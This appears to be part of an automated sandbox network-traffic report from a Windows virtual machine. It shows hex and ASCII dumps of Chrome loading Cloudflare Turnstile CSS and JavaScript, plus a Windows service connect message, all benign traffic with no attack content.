                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                              Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                              Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                              Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                              Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                              Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                              Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                              Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.649756104.18.94.414436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:59 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                              Host: challenges.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:36:00 UTC471INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:36:00 GMT
                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                              Content-Length: 47692
                                                                                              Connection: close
                                                                                              accept-ranges: bytes
                                                                                              last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                              access-control-allow-origin: *
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c771af3b0f75-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:36:00 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                              Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                              Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                              Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                              Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                              Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                              2024-12-19 13:36:00 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                              Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              14192.168.2.64975320.198.118.190443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:36:00 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 4c 63 51 6b 48 4a 41 73 34 6b 75 58 65 53 59 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 62 65 38 31 66 62 32 36 33 62 37 38 34 0d 0a 0d 0a
                                                                                              Data Ascii: CNT 1 CON 304MS-CV: LcQkHJAs4kuXeSYu.1Context: debe81fb263b784
                                                                                              2024-12-19 13:36:00 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
